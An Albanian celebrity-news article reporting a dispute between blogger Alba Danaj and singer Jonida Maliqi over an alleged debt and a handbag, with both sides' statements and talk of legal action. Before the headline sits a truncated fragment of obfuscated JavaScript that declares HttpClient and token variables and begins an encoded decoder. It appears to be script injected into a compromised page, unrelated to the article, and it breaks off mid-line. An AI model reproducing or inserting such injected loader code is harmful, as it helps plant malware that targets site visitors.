;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Blogerja Alba Danaj flet për përplasjen me Jonida Maliqin

By

Përplasja mes Jonida Maliqit dhe blogeres Alba Danaj nisi nga një postim i kësaj të fundit në llogarinë e saj në Instagram, ku akuzon Jonidën për disa ‘borxhe’.

Alba kishte ironizuar deklaratën e këngëtares kur kjo e fundit kishte thënë se nuk do të blinte kurrë çanta “më të vogla se pëllëmba e dorës”.

Kontaktuar nga Prive.al, Jonida konfirmoi se ka nisur procedurat ligjore ndaj Albës duke thënë, “Gjithçka është e vërtetë, kam ndërmarrë hapa ligjore me avokat. Ende nuk ka një padi por komunikime zyrtare siç e kërkon ligji.”

Prive po ashtu ka kontaktuar edhe me blogeren e cila u përgjigj me një deklaratë të gjatë, duke insistuar se këngëtarja edhe e kishte fyer atë dhe familjen e saj:

“Më vjen keq që kjo situatë mori kaq zjarr dhe se prisja sinqerisht. Jam person që mundohem të mbaj ‘loë profile’, aq më tepër që nuk jetoj prej 20 vitesh në Shqipëri. E ashtuquajtura akuzë e imja është një realitet hidhur qe to doja të mos kishte ndodhur kurrë. Po çdo gjë është më se e vërtetë dhe kam prova. Përveç faktit banal që uli veten për një çantë, që me gjithë qejf nuk do e kisha zënë kurrë në gojë, po ta kishte lënë me aq dhe po të më ishte përgjigjur si njeri. Ajo filloi të marrë nëpër gojë pjesëtar të familjes gjithashtu edhe fëmijën që kisha në bark. Çdo gjë e fal por këtë të fundit jo. Është tepër delikate për një femër shtatzënë dhe sinqerisht e vuajta tepër në atë periudhë po heshta. Ky muhabet ka që në maj të vitit të kaluar.” – ka thënë blogerja për Prive.

Më detajisht për çantën në fjalë, blogerja kishte biseduar me Dosja.al, ku kishte thënë:

“Nuk e prisja të bënte kaq zë dhe nuk doja këtë lloj debati me askënd por situata s’është vetëm për çështje borxhi, aty ka më shumë. E gjithë kjo ka ndodhur vjet në maj të 2019-s. Më vjen keq që arriti në këtë pikë, por unë u trondita dhe u keqtrajtova në periudhën më të vështirë dhe delikate që një grua kalon që është ajo e shtatzënisë. Pavarësisht faktit që kishte kaluar më se 1 vit që Jonida më shmangej dhe nuk më kishte larë detyrimin e saj unë prapë në mënyrën më të rregullt i shkruajta një mesazh duke i kërkuar të më dërgonte në llogari shumën që më kishte borxh e mbi të gjitha një nga çantat kishte 1 vit që e përdorte. Jo vetëm që mora një përgjigje që as që bëhej fjalë të më paguante, por hajde merr edhe çantën dhe më jep 1000€ që t’i kam dhënë shkruante, ku në fakt i duhej të më jepte edhe 1500€ (vërtet se janë shuma qesharake). Përsëri më shumë gjakftohtësi i thashë mbaje dhe çantën edhe lekët se unë s’mund ta ul veten për një shumë kaq qesharake.”

Blogerja Alba Danaj u shpreh gjithashtu se zotëron materiale dhe prova për të ngritur një çështje zyrtarisht dhe ligjërisht, por që ka shpresuar që gjithçka të mbyllej mes tyre.

“Nga ana legale kam mundësi dhe prova plot dhe po fakti që unë çdo “luxury item” (produkt luksi) që e kam, e kam të siguruar dhe gjithashtu të regjistruar në sistem që më përket mua. Kam shumë material për të krijuar një çështje, por sinqerisht s’e kam marrë atë mundim sepse nuk ia vlen. Ajo le ta marrë po të dojë, unë jam gati. Sinqerisht nuk kam nevojë për këtë dramë por shpresoj të ngelë me kaq. Ajo po të dojë le të merret me këtë gjë. Jam këshilluar me avokatin tim këtu dhe çdo mesazh do e përdor në rrugë legale dhe jo mediatike. Nuk dua të merrem më me këtë temë kaq banale,”– përfundoi Alba për deklaratën për Dosja.al .

Artikuj të ngjashëm